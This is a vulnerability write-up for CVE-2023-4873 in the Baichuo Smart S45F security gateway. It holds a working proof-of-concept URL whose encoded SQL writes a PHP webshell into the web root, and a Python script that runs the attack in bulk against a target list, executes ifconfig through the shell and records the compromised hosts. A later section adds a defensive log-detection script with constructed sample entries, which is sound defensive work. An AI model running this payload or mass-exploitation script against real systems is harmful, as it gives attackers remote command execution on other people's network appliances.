Beijing Baichuo Smart S45F Multi-Service Security Gateway Intelligent Management Platform: Unauthenticated SQL Execution Leading to RCE (CVE-2023-4873)

Vulnerability Info · Network Security · 2023-09-16 · 871 views

Root cause

The SQL statement execution interface is reachable without authentication, so any SQL statement can be executed against the backend database.

Affected products

Smart S45F

Impact

A remote, unauthenticated attacker can execute arbitrary SQL statements, including writing a webshell into the web root with INTO OUTFILE, which gives command execution on the appliance.

POC & EXP

Manual

Vulnerable endpoint: https://ip:port/importexport.php
This endpoint executes a SQL statement supplied through GET parameters:

Parameter sql = the SQL statement, base64-encoded
Parameter type = exportexcelbysql, the action that triggers execution

POC:

https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql

base64 decoded: select 0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e into outfile '/usr/hddocs/nsg/app/sec.php'

hex decoded: <?php echo system($_POST["cmd"]);?>

The PHP source is passed as a MySQL hex literal so that no quotes are needed inside the statement. The write only succeeds because the database user holds the FILE privilege, secure_file_priv does not block the target directory, and the database shares a filesystem with the web root /usr/hddocs/nsg/; on a target where any of those conditions fails the request returns without dropping the file.

Webshell address: https://ip:port/app/sec.php (accepts the command in the POST parameter cmd)

Script

import requests
import urllib3

# Optional: route traffic through a local proxy (e.g. Burp) to inspect requests.
proxies = {
    'http': 'http://127.0.0.1:7890',
    'https': 'http://127.0.0.1:7890'
}

# Same base64 payload as the manual PoC: writes the one-liner shell to /usr/hddocs/nsg/app/sec.php
PAYLOAD = ('/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc='
           '&type=exportexcelbysql')

# Appliances normally ship self-signed certificates, so skip TLS verification.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# order.txt: one target per line, e.g. https://ip:port
# Strip the newline, otherwise it ends up in the middle of the request URL.
with open("order.txt", "r") as f:
    urls = [line.strip() for line in f if line.strip()]

with open("get.txt", "w") as out:
    for target in urls:
        try:
            r = requests.get(target + PAYLOAD, proxies=proxies, verify=False, timeout=10)
            if r.status_code == 200:
                # The appliance runs Linux (web root /usr/hddocs/nsg), so verify with ifconfig
                # and look for an "eth" interface name in the output.
                r = requests.post(target + '/app/sec.php', data={'cmd': 'ifconfig'},
                                  proxies=proxies, verify=False, timeout=10)
                if r.status_code == 200 and "eth" in r.text:
                    print("get it! " + target)
                    out.write(target + "\n")
            else:
                print(str(r.status_code) + ": " + r.text)
        except requests.RequestException as e:
            print("error: " + target + " " + str(e))
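For defenders, the same request shape is easy to spot in web-server access logs. The following detection pass is an added example and is not part of the original writeup or of the referenced PoC repository: it extracts the base64 sql parameter from requests to importexport.php, decodes it, expands MySQL hex literals so the file body being written is readable, and ranks INTO OUTFILE/DUMPFILE writes above plain queries. The log lines are constructed here to mirror the PoC, and the severity labels and the rule for a follow-up POST to /app/sec.php are assumptions derived only from this page's payload.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs


def _b64(sql: str) -> str:
    """Base64-encode a SQL string the way it appears in the query string (URL-safe escapes)."""
    return base64.b64encode(sql.encode()).decode().replace("+", "%2B").replace("=", "%3D")


# Hex literal from the page's PoC: <?php echo system($_POST["cmd"]);?>
WEBSHELL_HEX = "0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e"

# Constructed sample access-log entries (combined log format), not real traffic:
# 1) the PoC write, 2) a plain unauthenticated SELECT, 3) the follow-up POST to
# the dropped shell, 4) unrelated noise.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [16/Sep/2023:10:01:02 +0800] "GET /importexport.php?sql='
    + _b64(f"select {WEBSHELL_HEX} into outfile '/usr/hddocs/nsg/app/sec.php'")
    + '&type=exportexcelbysql HTTP/1.1" 200 12',
    '10.0.0.7 - - [16/Sep/2023:10:02:15 +0800] "GET /importexport.php?sql='
    + _b64("select 1 from users") + '&type=exportexcelbysql HTTP/1.1" 200 512',
    '10.0.0.5 - - [16/Sep/2023:10:03:40 +0800] "POST /app/sec.php HTTP/1.1" 200 300',
    '10.0.0.2 - - [16/Sep/2023:10:04:01 +0800] "GET /index.php HTTP/1.1" 200 1024',
])

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
WRITE_RE = re.compile(r"\binto\s+(outfile|dumpfile)\b", re.IGNORECASE)
HEX_RE = re.compile(r"\b0x([0-9a-fA-F]{2,})")


def decode_hex_literals(sql: str) -> str:
    """Replace MySQL hex literals with their decoded text so the written content is visible."""
    def _sub(m):
        try:
            return repr(bytes.fromhex(m.group(1)).decode("utf-8", "replace"))
        except ValueError:          # odd-length hex: leave the literal untouched
            return m.group(0)
    return HEX_RE.sub(_sub, sql)


def analyze_line(line: str):
    """Return a finding dict for one access-log line, or None if it is unrelated."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    client = line.split(" ", 1)[0]
    parts = urlsplit(m.group("target"))
    params = parse_qs(parts.query)   # also URL-decodes %3D / %2B in the base64 value
    if parts.path.endswith("/importexport.php") and "sql" in params:
        raw = params["sql"][0]
        try:
            sql = base64.b64decode(raw, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            # Undecodable payloads are still unauthenticated calls to the SQL endpoint.
            return {"client": client, "severity": "high",
                    "reason": "sql param not valid base64", "sql": None}
        if WRITE_RE.search(sql):
            severity, reason = "critical", "file write via INTO OUTFILE/DUMPFILE"
        else:
            severity, reason = "high", "unauthenticated SQL execution"
        return {"client": client, "severity": severity, "reason": reason,
                "sql": decode_hex_literals(sql)}
    if m.group("method") == "POST" and parts.path.endswith("/app/sec.php"):
        # Assumed indicator: the path the PoC drops its shell at (attackers may choose another).
        return {"client": client, "severity": "critical",
                "reason": "POST to webshell path dropped by the PoC", "sql": None}
    return None


def scan_log(text: str):
    """Run analyze_line over every line and keep only the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["client"], f["reason"], f["sql"] or "")
```

Any sql parameter reaching importexport.php from outside an authenticated session is worth an alert on its own, because the endpoint should never be callable anonymously; the write-primitive check only decides how urgently to treat it. Matching on the decoded statement rather than on the raw query string is what makes the rule survive re-encoding of the same payload.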

References

https://github.com/cugerQDHJ/cve/blob/main/rce.md
